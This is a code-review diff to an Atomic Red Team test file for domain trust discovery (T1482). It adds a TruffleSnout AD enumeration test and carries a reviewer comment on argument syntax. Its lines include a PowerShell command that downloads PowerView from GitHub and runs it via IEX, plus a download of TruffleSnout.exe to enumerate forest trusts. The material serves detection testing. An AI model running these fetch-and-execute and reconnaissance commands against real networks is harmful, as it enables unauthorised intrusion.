atomics/T1482/T1482.yaml

```diff
@@ -131,4 +131,32 @@ atomic_tests:
     command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-ForestTrust -Verbose
-    name: powershell
\ No newline at end of file
+    name: powershell
+
+- name: TruffleSnout - Listing AD Infrastructure
+  description: |
+    Iterative AD discovery toolkit for offensive operators. Situational awareness and targeted low noise enumeration. Preference for OpSec.- https://github.com/dsnezhkov/TruffleSnout
+  supported_platforms:
+  - windows
+  input_arguments:
+    trufflesnout_path:
+      description: Path to the TruffleSnout executable
+      type: Path
+      default: PathToAtomicsFolder\T1482\src\TruffleSnout.exe
+    domain:
+      description: Domain name to search on
+      type: String
+      default: top.int
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      TruffleSnout.exe must exist on disk at specified location (#{trufflesnout_path})
+    prereq_command: |
+      if (Test-Path #{trufflesnout_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1482/src/TruffleSnout.exe" -OutFile #{trufflesnout_path}
+  executor:
+    command: |
+      #{trufflesnout_path} forest -n {domain}
```

Comment:
also, for specifying the input args, you'll need the # before the squiggly braces. (needed for the two {domain} arguments.